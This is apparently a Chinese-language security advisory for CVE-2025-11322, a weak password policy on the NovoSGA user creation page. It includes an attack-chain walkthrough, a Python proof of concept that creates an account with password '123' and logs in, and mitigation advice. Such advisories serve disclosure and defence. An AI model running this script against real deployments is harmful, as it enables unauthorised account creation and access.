CVE-2025-11322 Mangati NovoSGA用户创建页面弱密码策略漏洞

漏洞信息

漏洞编号

CVE-2025-11322

漏洞类型

弱密码策略（Weak Password Policy）

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mangati NovoSGA

漏洞概述

CVE-2025-11322是Mangati NovoSGA排队管理系统中存在的一个弱密码策略漏洞，影响版本至2.2.12。NovoSGA是一款开源的排队管理系统（Queue Management System），广泛应用于各类服务窗口场景，如医院、银行、政府办事大厅等，用于管理客户服务流程。该漏洞位于系统的用户创建页面（/novosga.users/new），具体涉及用户注册或创建过程中"Senha"（密码）和"Confirmação da senha"（确认密码）字段的验证逻辑缺陷。

该漏洞的核心问题在于系统在用户创建过程中未对密码强度进行充分校验，允许用户设置过于简单的密码，如短密码、纯数字密码、常见字典词等弱密码。这种弱密码策略使得攻击者可以通过暴力破解、字典攻击或凭证填充等方式更容易猜测或破解用户密码，从而获取对系统的未授权访问权限。

根据CVSS 3.1评分标准，该漏洞评分为3.7分，属于低危级别。攻击向量为网络（AV:N），攻击复杂度高（AC:H），无需权限（PR:N）和用户交互（UI:N）。虽然漏洞本身利用复杂度较高，但其对系统安全性的潜在影响不容忽视，特别是在处理敏感客户信息的排队管理系统中。

该漏洞已于2025年10月6日公开披露，研究者marcelomulder在GitHub上发布了相关漏洞详情和概念验证（PoC）信息。值得注意的是，供应商在被告知该漏洞后未做出任何回应，这进一步增加了受该漏洞影响的系统的安全风险。

技术细节

从技术层面分析，该漏洞源于NovoSGA用户创建模块中密码验证逻辑的缺失或不足。在正常的Web应用中，用户注册或创建功能应包含以下安全控制措施：

1. **密码长度要求**：通常要求密码至少8-12个字符；
2. **密码复杂度要求**：要求包含大小写字母、数字和特殊字符的组合；
3. **常见密码检查**：阻止使用已知弱密码（如123456、password等）；
4. **密码历史检查**：防止重复使用近期使用过的密码。

在NovoSGA 2.2.12及以下版本中，用户创建页面（/novosga.users/new）的后端处理逻辑未实施上述密码强度校验措施。攻击者可以通过直接向该端点发送HTTP POST请求，在Senha和Confirmação da senha字段中提交任意弱密码，系统将直接接受并创建用户账户。

利用方式如下：
- 攻击者首先访问目标系统的用户创建页面；
- 构造包含弱密码的注册请求；
- 提交请求后，系统将使用弱密码创建账户；
- 攻击者随后可以使用该弱密码进行登录，或利用已知弱密码列表对系统其他账户进行暴力破解攻击。

尽管该漏洞的直接利用复杂度较高（AC:H），但一旦成功创建弱密码账户，攻击者将获得对系统的初始访问权限，进而可能利用系统中的其他漏洞进行权限提升或横向移动，对系统安全构成实质性威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统运行Mangati NovoSGA 2.2.12或更早版本，并定位用户创建页面端点 /novosga.users/new

STEP 2

步骤2：探测弱密码策略

攻击者访问用户创建页面，尝试使用简单密码（如123、abc、password等）创建测试账户，验证系统是否接受弱密码

STEP 3

步骤3：创建弱密码账户

攻击者利用系统未实施密码强度校验的缺陷，成功创建一个使用弱密码的用户账户

STEP 4

步骤4：账户登录

攻击者使用创建的弱密码账户登录系统，获取对NovoSGA管理界面的访问权限

STEP 5

步骤5：权限提升与横向移动

利用已获取的访问权限，攻击者尝试提权或利用系统中其他漏洞进行横向移动，进一步危害系统安全

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11322 - Mangati NovoSGA Weak Password Policy PoC # Vulnerability: Weak password requirements in user creation page # Affected: Mangati NovoSGA <= 2.2.12 # Endpoint: /novosga.users/new import requests TARGET_URL = "http://target-novosga-server" CREATE_USER_ENDPOINT = "/novosga.users/new" # Step 1: Get the user creation page to retrieve CSRF token (if any) session = requests.Session() response = session.get(f"{TARGET_URL}{CREATE_USER_ENDPOINT}") # Step 2: Prepare the payload with a weak password # The vulnerability allows passwords like "123", "abc", or single characters weak_password_payload = { "username": "test_user_weak", "email": "[email protected]", "senha": "123", # Weak password - only 3 digits "confirmacao_senha": "123", # Password confirmation "nome": "Test", "sobrenome": "User", "perfil": "USER", "status": 1 } # Step 3: Submit the user creation request with weak password response = session.post( f"{TARGET_URL}{CREATE_USER_ENDPOINT}", data=weak_password_payload, headers={ "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{TARGET_URL}{CREATE_USER_ENDPOINT}" } ) # Step 4: Verify the account was created with weak password if response.status_code == 200 or response.status_code == 302: print("[+] User created successfully with weak password '123'") # Step 5: Attempt login with the weak password login_endpoint = "/novosga.login" login_payload = { "username": "test_user_weak", "password": "123" } login_response = session.post( f"{TARGET_URL}{login_endpoint}", data=login_payload ) if "dashboard" in login_response.url or login_response.status_code == 302: print("[+] Successfully logged in with weak password!") print("[+] Vulnerability CVE-2025-11322 confirmed") else: print(f"[-] Request failed with status code: {response.status_code}") # Additional weak passwords to test: # "a" (single character) # "password" (common dictionary word) # "123456" (sequential numbers) # "qwerty" (keyboard pattern)

影响范围

Mangati NovoSGA <= 2.2.12

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）或反向代理限制对/novosga.users/new端点的访问，仅允许可信IP地址访问；2）手动审查已创建的用户账户，识别并强制修改使用弱密码的账户；3）在数据库层面为所有用户密码添加额外的哈希加盐处理，提高密码存储安全性；4）部署入侵检测系统（IDS）监控异常的账户创建和登录行为；5）实施网络层面的访问控制，限制NovoSGA管理界面的暴露范围。